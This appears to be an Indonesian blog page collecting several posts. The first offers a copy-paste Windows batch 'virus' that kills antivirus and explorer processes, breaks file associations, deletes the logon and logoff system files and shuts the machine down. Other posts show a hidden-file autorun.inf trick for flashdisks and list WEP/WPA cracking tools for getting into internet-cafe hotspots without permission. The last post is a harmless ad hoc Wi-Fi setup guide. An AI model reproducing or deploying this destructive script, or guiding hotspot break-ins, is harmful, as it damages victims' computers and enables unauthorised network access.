Google Translate
Arabic Korean Japanese Chinese Simplified Russian Portuguese English French German Spain Italian Dutch

1 Cara Sederhana Membuat Virus Komputer

Virus komputer adalah sebuah program komputer yang dapat menyalin sendiri atau menggandakan dirinya sendiri dan menginfeksi system komputer yang secara umum bersifat merusak. Tetapi, taukah kamu bahwa virus komputer itu dapat dibuat secara sederhana, tulisan dibawah ini merupakan salah satu cara membuat virus komputer dengan cara yang sangat sederhana. Tetapi sebelum kamu membaca dan mempraktekkan tulisan tersebut perlu dipahami bahwa postingan ini hanya bersifat menambah pengetahuan kamu bukan sebagai hal yang berdampak negatif dan apapun yang terjadi setelah mempraktekkan tulisan dibawah ini, saya terlepas dari dampak yang terjadi




Mudah cara untuk membuat kode Virus 

Virus ini dapat menyerang:
1. Menhapus, NAVAPSVC.exe
2. Menhapus, Explorer.exe (taskbar dan ikon akan hilang)
3. Menhapus, zonelabs.exe
4. mengubah asosiasi file exe menjadi txt (ketika membuka file exe, akan pergi ke notepad)
5. mengubah asosiasi file txt menjadi mp3 (ketika membuka file txt, maka akan terbuka WinAmp atau multimedia player)
6. Menghapus Login / Logoff Screens

Hanya Copy kode di bawah ini lalu paste Pada Notepad:



title virus is my dna
color 0A
@echo off
set end=md “u cant eascape from me-vishnu”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * andhra pradesh- virus created in karimnagar from jits college
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
assoc .mp3=.vcf
cls
msg * hi dude this is begining.
msg * vishnu attcked the system try to challenge him .
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown


Simpan di C: dengan nama installhack.bat 
Selesai



Tapi jgan untuk KKejahatan Ya...xixixixixixix.....

0 MEMBUAT ANTI VIRUS PADA FLASHDISK

MEMBUAT ANTI VIRUS PADA FLASHDISK
oke... langsung aja ye.,...
mungkin udah pada tau ya ...gimana cara membuat AUTORUN pada flashdisk..nah disini kita
akan memanfaatkan script untuk membuat autorun tersebut untuk mengaktifkan anti virus yang
nantinya akan kita copy pada flashdisk kita.. #
software pertama yang kita perlukan ya jelas aja ANTIVIRUS berukuran kecil (banyak
berserakan di internet,,tinggal tanya aja ama paman google:-)..)contohnya aja PCMAV,
ANSAV..dll..pokoknya banyak dah...(tapi penulis lebih sering pake PCMAV...abiz ukurannya
kecil banget ..!!gak sampe 1 MB euy.n'tampilannya yang familiar buat semua orang...)
oke deh...kita buat script dulu untuk autorun di Flasshdik kita....
tinggal ketik aja di notepad..

|---------------------------------------------------------------------------------------|
| |
|[AutoRun] |
|open=namaantivirus.exe |
|shellexecute=namaantivirus.exe |
|shell\Scan_Viruz_dulu_Donkz:-)_!!!\command=namaantivirus.exe |
|shell=Scan_Viruz_dulu_Donkz:-)_!!! |
| |
|---------------------------------------------------------------------------------------|


udah ente copy pa belum tu script...??
kalo udah ya lanjut donk mas...................
kita save dengan nama "autorun.inf"(gak pake tanda kutip) di flashdisk kita
sekarang tinggal kita copy aja antivirus yang mau kita masukin ke flashdisk..!!!
(inget....kalo ngopy file autorun n' antivirusnya bukan di dalam folder..)
jadi deh..^_^!!kalo mau scan virus tinggal double click aja tuh drive flashdisk kita!!
kalo kita klik kanan drive flashdisknya bakalan ada tambahan kata di atas kata
AUTOPLAY.
Scan_Viruz_dulu_Donkz:-)_!!!................xixixixiixixix

kalo mau di ubah ya kita tinggal ganti aja kata-kata yang ada di dalam script...!

|-----------------------------------------------------------------------|
| shell\kata-kata_anda\command=namaantivirus.exe |
| shell=kata-kata_anda |
|-----------------------------------------------------------------------|


lho...gimana cara buka flashdisknya neh???
xixiixixiix.....gak mungkin lah gak pada tau.,...tinggal klik kanan aja drivenya truz pilih
open...!@
oya...gak bagus ya kalo di dalam flashdisk kita ada keliatan nama file AUTORUN n'
antivirusnya...ngerusak pemandangan geto....
kalo gitu tinggal kita ubah aja attributnya jadi super hidden:-)
(tu bahasa gaulnya)hehehehe..............
caranya...???
sekali lagi sory buangetzzz buat para master master di yogyafree yang pastinya udah pada tau
cara beginian...,.karena artikel ini ditujukan buat para NEWBIE...xixiixixixi

|-----------------------------------------------------------------------------------------|
| |
|-buka RUN dari start menu ` |
|-terus ketik cmd |
|-abiz tu....kita masuk ke dalam drive flashdisk (biasanya drive f:) |
|-udah gitu ya kita tulis commandnya |
| f:\>attrib +h +s namaantivirus.exe (buat hidden antivirusnya) |
| f:\>attrib +h +s autorun.inf (buat hidden file autorun) |
| |
|-----------------------------------------------------------------------------------------|

tara............ilang deh file nya/.......................

flashdisk siap dipergunakan:-)
huh....selesai deh proyek kita.....
xixiixixixi.........................
sory buat kru x-code yang mungkin udah mengkel baca ni artikel karena udah basi...!!
tapi inget.....masih banyak para newbie di sekitar kita yang membutuhkan ilmu seperti ini..

1 Hack Wireless LAN Warnet

Sudah cukup banyak Hotspot area yang beredar dalam lingkungan tempat kita tinggal, baik yang bersumber dari warnet - warnet maupun dari tempat lokasi pengguna Wireless LAN yang memberikan akses Hotspot Area, tidak hanya itu saja, ada pun yang free ada pun menggunakan password untuk mendapatkan akses penggunanan koneksi tersebut. Contohnya untuk kalangan warnet warnet, meskipun terdapat area Hotspotnya, namun masih ada password yang tepasang, sehingga kita tidak dapat menggunakan koneksi internet

Namun hal tersebut tidak menjadi halangan untuk para hacker mania, mereka mencoba mencari password tersebut dan membongkarnya untuk mendapatkan koneksi yang diinginkan. 
Apakah kita mampu melakukannya? 
Tentu kita pun mampu melakukannya, dengan bantuan mereka lah kita bisa mempelajarinya, sudah banyak artikel dan tool yang membahas hack wireless, seperti di binushacker.net, disana banyak sekali tutorial hacker, dari cara hack wireless hingga hack website sekalipun, Namun Tech Id tidak mengajarkan untuk berbuat jahat, namun hal ini bisa kita manfaatkan untuk menambah ilmu dan mengatasi bagaimana jika kita mempunya warnet dengan koneksi wireless namun terkena hack. Kata orang orang sih, kalo kita ingin menjadi jago dalam security apa pun, baik jaringan maupun website, kita harus terjun terlebih dahulu atau mempelajari hal hal yang dilakukan para hacker. Dari pada banyak ngemen, lebih baik kita bahas disini tool yang dimanfaatkan untuk melakukan hack wireless LAN Warnet. 




WIRELESS HACKING TOOL

NetStumbler
Netstumbler yang dikenal sebagai Jaringan Stumbleris suatu alat acilitates detecting dari Wireless Lans menggunakan Wireless 802.11b, 802.11a dan 802.11g WLAN standar yang berjalan pada sistem operasi dari microsoft Win98 – Win Vista, ada versi lain juga yang disebut Anothere Mini Stumbler yang menggunakan sistem operasi Windows CE. Untuk alat” kecil yang bisa di genggam.
Anda bisa mendapatkannya disini

Aircrack
Tercepat untuk WEP / WPA cracking tool
Aircrack adalah suite alat untuk 802.11a/b/g WEP dan WPA cracking. Hal ini dapat dilakukan dalam 40 sampai 512-bit password WEP dan hanya sekali dienkripsi paket” telah dikumpulkan. Aircrack juga dapat menyerang WPA 1 atau 2 jaringan dengan menggunakan metode lanjutan cryptographic kasar atau memaksa. Suite yang mencakup airodump (802,11 sebuah paket pengambil program), aireplay (802,11 sebuah paket suntikan program), aircrack (statis WEP dan WPA-PSK cracking), dan airdecap (decrypts WEP / WPA untuk pengambil file).
Anda dapat memperoleh Aircrack disini

Airsnort
802,11 WEP Encryption Cracking Tool
AirSnort adalah LAN nirkabel (WLAN) tool yang digunakan untuk merecover enkripsi password. Ia dikembangkan oleh shmoo kelompok pasif dan dioperasikan oleh pemantauan transmisi, komputasi enkripsi password akan dilakukan bila paket telah dikumpulkan. Anda mungkin juga akan tertarik dengan Airsnort ini.
Anda dapat memperoleh AirSnort disini

Cowpatty
Cowpatty ini adalah tools yang baik untuk memaksa cracking WPA-PSK, yang dianggap “WEP Baru” untuk Home Wireless Security. Program ini hanya mencoba a bunch dari berbagai pilihan dari kamus file untuk melihat dan menemukan apa yang didefinisikan sebagai Pre-Shared Key.
Anda dapat memperoleh Cowpatty disini

Asleap
Alat ini sangat bagus ketika menggunakan jaringan Leap. Alat ini dapat digunakan untuk mengumpulkan data otentikasi yang sedang lewat di jaringan, dan ini dapat di sniffed sehingga bisa di crack. Leap tidak melindungi otentikasi lainnya seperti “real” EAP, yang merupakan alasan utama mengapa Leap dapat mudah rusak.
Anda dapat memperoleh Leap disini

Ethereal
Ethereal digunakan oleh seluruh dunia Wind0s oleh kedua sistem operasi dan opensource, yang digunakan untuk mengatasi masalah, analisis, dan perangkat lunak protokol pembangunan, dan pendidikan. Memiliki semua fitur-fitur standar yang akan diharapkan dalam analisa protokol, dan beberapa fitur tidak dilihat pada setiap produk. Lisensi open source memungkinkan penambahan perangkat tambahan bagi anda” yang memiliki keahlian. Bagus loh.. Coba deh 
Anda dapat men-download Ethereal disini

0 Membuat Koneksi Wireless Antar Laptop

Kalau anda mempunyai dua buah laptop atau lebih atau komputer desktop yang mempunyai wireless LAN card (wifi) dan antara masing – masing laptop/ komputer tersebut ingin terhubung atau terkoneksi satu sama lain sehingga dapat sharing data, printer, internet, remote komputer dll. Cara sederhana dapat dilakukan dengan koneksi adhoc yaitu koneksi wireless LAN tanpa menggunakan akses point, terhubung langsung antara komputer ke komputer lainnya tanpa menggunakan kabel.

Setting koneksi adhoc untuk windows xp sp2 adalah sebagai berikut :

• Nyalakan wifi
• Masuk ke network connection (klik start -->Control Panel --> Network and internet connection --> Network Connection )
• Klik kanan pada wireless network connection, kemudian klikproperties.

• Pilih Tab Wireless Networks --> klik Advanced


• Pilih Computer-to-computer (ad hoc) networks only
• klik Close, Tampilan akan kembali ke jendela Wireless Network Connnection Properties
 Pada Preferred networks , klik Add

• Beri nama Network name (SSID) sesuai dengan yang kita inginkan misalnya contoh disini saya beri nama mynet (pada komputer yang lain namanya harus sama (mynet)).-->klik OK
 Pada Wireless network key, agar lebih mudah dulu  network Authentication diisi : Open , pada Data encryption diisi :Disable. ( kalau mau langsung pakai proteksi juga silakan, tapi sebaiknya seperti ini dulu, nanti kalau sudah berhasil koneksinya silakan utak-atik option ini )
Sehingga pada preferred networks akan tampil nama SSIDyang sudah kita buat dengan nama mynet --> klik ok untuk keluar.

• Lakukan hal / langkah yang sama pada laptop/komputer yang lain yang akan dikoneksikan. ( ingat nama /network name (SSID) harus sama ( mynet)).


 Kalau kedua komputer sudah disetting seperti langkah di atas, langkah selanjutnya adalah tinggal mengkoneksikannya yaitu dengan masuk ke Network Connection, kemudian klik kanan pada Wireless Network Connection --> pilih View available wireless networks.
Disana akan tampil SSID dengan nama mynet, sorot dengan mouse kemudian klik tombol Connect. Tunggu beberapa saat sampai statusnya Connected.


• Sebenarnya kalau komputer kesatu selalu nyala, pada komputer kedua dan ketiga dan seterusnya tidak perlu disetting apapun, cukup nyalakan wifinya, View available wireless networks, pilih dan kemudian Connect. (seperti kalau kita koneksi pada hotspot). 


• Untuk Melihat berhasil tidaknya koneksi antar komputer, kita bisa melakukan perintah ping ke nama komputer lawan.
untuk mengetahui nama komputer : klik kanan pada my computer --> properties --> pilih tab Computer Name-->full computer name ( = nama komputer)
- Buka Command prompt (start --> klik RUN--> ketik cmd--> klik OK )
- Ketik ping namakomputerlawan (ping spasi nama komputer lawan) tekan enter, kalau berhasil akan ada reply darikomputer lawan.
- Kalau tidak ada reply bukan berarti belum berhasil, karena mungkin fungsi untuk pingnya dari komputer tersebut disable.

• Cara lain :
Dengan melihat IP address yang didapat oleh masing - masing komputer. ( karena cara diatas kita tidak mengisi nomor IP secara manual, tetapi secara otomatis/DHCP, ( maksudnya otomatis disini supaya lebih mudah , di bagian bawah ada cara setting IP secara manual ).
Cara melihat IP address yang didapat yaitu masuk kembali keNetwork Connection--> dobel klik pada wireless network connection yang sedang terkonek--> kemudian klik Support, (dilakukan di kedua komputer ), kemudian bandingkan hasilnya.

Masing - masing komputer harus mendapat nilai subnet maskyang sama : misal disini subnet masknya didapat255.255.255.0 (kelas C), komputer-a dan komputer-b harus sama yaitu 255.255.255.0
Masing - masing komputer harus mendapat IP address yang satu network misal kalau komputer-a mendapat 192.168.0.X, maka komputer-b harus mendapat 192.168.0.X juga (hanya nilai Xnya saja yang berbeda antara komputer a dan b).
Klik Repair di salah satu komputer kalau tidak didapatkan nilai seperti ketentuan di atas, sampai mendapatkan IP address dansubnet mask yang sesuai.






Setting IP Secara Manual

• Bisa saja pada beberapa kasus akan kesulitan mendapatkan IP sehingga koneksi tidak berhasil, maka kita harus set IP secara manual.
Caranya :
-masuk ke network Connections-->klik kanan pada wireless network --> klik properties.
-Dobel klik pada internet protocol (Tcp/ip) --> klik pada use the following ip address.Pada komputer kesatu set ip address : 192.168.0.1 subnet mask: 255.255.255.0 
Pada komputer kedua set ip address : 192.168.0.2 subnet mask: 255.255.255.0
Pada komputer ketiga set ip address : 192.168.0.3 subnet mask: 255.255.255.0
Dan seterusnya..
Apabila komputer kesatu mempunyai koneksi internet dan akan sharing ke yang lainnya, maka pada komputer kedua, ketigadan seterusnya. Kolom Default Gateway dan Preferred DNS servernya harus diisi yaitu : 192.168.0.1 .







Untuk melakukan Sharing Data :


• Klik kanan pada drive atau folder yang akan disharing --> pilih Sharing and security
--> Contreng pada Share this folder on network, isi Share name.--> klik OK

• Untuk mengakses data dari komputer lawan bisa dilakukan dengan mengetik di RUN command \\namakomputer atau\\noIPaddress komputer lawan yang akan diakses.


Untuk Sharing Koneksi Internet

• Di komputer yang ada koneksi internetnya masuk keNetwork Connection --> Klik kanan pada koneksi internetyang akan disharing --> klik properties
• Pilih Tab Advanced, Contreng Allow other network user to connect through this …,
• Klik tombol Setting, contreng services yang akan disharing, (yang mutlak untuk sharing internet adalah Web Server (HTTP), yang lainnya HTTPS, FTP, POP3, dll terserah anda sesuai kebutuhan, atau boleh juga pilih semua.--> kemudian klikOK.

Semoga Bermanfat...